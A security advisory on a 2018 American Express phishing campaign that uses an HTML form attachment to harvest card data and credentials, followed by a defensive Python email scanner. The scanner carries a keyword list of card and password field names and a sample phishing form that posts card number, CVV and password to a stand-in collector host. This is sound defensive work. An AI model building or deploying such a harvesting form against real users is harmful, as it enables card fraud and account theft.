Beware of American Express Emails With Attached Phishing Form
(Dec 29, 2018)
A phishing campaign has been discovered targeting American Express card users with emails claiming that security issues have been raised in relation to the user's card. The email states that there is a security concern that requires addressing and contains an attached HTML form that requests various information. The information requested in the form includes: American Express card number, birth year, CVV, card ID number, expiration date, first elementary (primary) school name, mother's birth date and maiden name, online account credentials, and security PIN. The form then also asks the user to enter a new username and password to use. If the user enters this information into the form and submits it, the data is sent to the threat actor's remote host. After the remote host receives the data, it redirects the user to a legitimate "americanexpress[.]com" page that says "thank you for your feedback."
Recommendation: All employees should be educated on the risks of phishing, specifically how to identify such attempts and whom to contact if a phishing attack is identified. Emails that ask the recipient to follow a link and then enter credentials are often an indicator of a phishing attack. Credit card companies in particular will never prompt a user to enter all of their sensitive security information into HTML forms without direct verbal communication, so complying with any request to input all of one's credentials into an online form is not recommended.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.
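As an added example (not part of the original report), the following mail-gateway style check flags the pattern described above: an HTML attachment whose form submits credential or card fields to a remote host. The field-name hints, function names, and the sample message with its `.example` host are constructed assumptions.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: substrings of input names that suggest credential or card capture.
SENSITIVE_HINTS = ("pass", "pin", "cvv", "card", "maiden", "user")

class FormScanner(HTMLParser):
    """Collects each <form>'s action URL and the (name, type) of its inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append(
                ((a.get("name") or "").lower(), (a.get("type") or "text").lower()))

def scan_message(raw_bytes):
    """Return findings for HTML attachments whose forms send sensitive fields to a remote host."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".html", ".htm")):
            continue
        body = part.get_content()
        html = body if isinstance(body, str) else body.decode("utf-8", "replace")
        scanner = FormScanner()
        scanner.feed(html)
        for form in scanner.forms:
            host = urlparse(form["action"]).hostname  # None for relative or empty actions
            sensitive = sorted({n for n, t in form["fields"]
                                if t == "password" or any(h in n for h in SENSITIVE_HINTS)})
            if host and sensitive:
                findings.append({"attachment": name, "post_host": host, "fields": sensitive})
    return findings

def build_sample():
    """Constructed sample message; the collector host is a reserved .example name."""
    m = EmailMessage()
    m.set_content("Please complete the attached form.")
    html = ('<form method="post" action="https://collector.example/submit"><input name="card_number">'
            '<input name="cvv"><input type="password" name="account_password"></form>')
    m.add_attachment(html, subtype="html", filename="form.html")
    return m.as_bytes()
```

A hit is a triage signal rather than a verdict; the reported `post_host` can be compared against the organization's allowlist before quarantining.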